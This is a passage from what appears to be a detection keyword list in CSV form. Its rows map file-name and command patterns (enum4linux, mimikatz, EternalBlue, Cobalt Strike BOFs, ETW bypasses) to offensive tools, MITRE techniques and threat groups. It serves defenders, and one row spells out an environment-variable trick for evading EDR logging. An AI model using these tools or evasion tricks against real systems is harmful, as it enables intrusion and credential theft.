+"*enum_logged_on_users*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_logged_on_users.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_mikrotik.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_ms_product_keys.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_printers.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*enum_shares.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*enum_shares.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_vmware.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_vyos.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum4linux*","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. 
It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","N/A","N/A","10","944","228","2023-05-09T22:54:24Z","2015-07-31T21:06:03Z"
+"*enum4linux_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*enum4linux-ng -A -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*EnumCLR.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Enum-Creds*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*enumerate.cna*","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z"
+"*EnumerateAllDomainControllers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*Enumerate-AllHighPrivilegePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z"
+"*EnumerateDomainGpo*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z"
+"*Enumerate-MFAStatusOfHighPrivilegePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z"
+"*Enumeration/DesktopACL*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Enumeration\DesktopAC*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*env_var_spoofing_poc.cpp*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*eo.oe.kiwi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*eppiocemhmnlbhjplcgkofciiegomcon*","greyware_tool_keyword","Urban Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*Erebus/*spacerunner*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*error in libcrypto*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*eRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*ES.Alan.Core/*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*EspressoCake/PPLDump_BOF*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*Eternalblue-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*EternalBlue.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*eternalblue.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Eternalblue-Doublepulsar*","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11]","T1055 - T1043 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","10","1055","545","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z"
+"*EternalHushFramework-*-SNAPSHOT.jar*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*EternalHushFramework-main*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*EternalHushMain.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*EternalHushWindow.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*ethereum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*ETWEventSubscription*Program.cs*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*ETWEventSubscription.exe* -ProcStart *","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*ETWEventSubscription.exe* -UserLogon*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*etw-fuck.exe *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z"
+"*EtwHash.exe*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z"
+"*EtwHash.git*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z"
+"*ETWHash.sln*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z"
+"*etwti-hook.*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
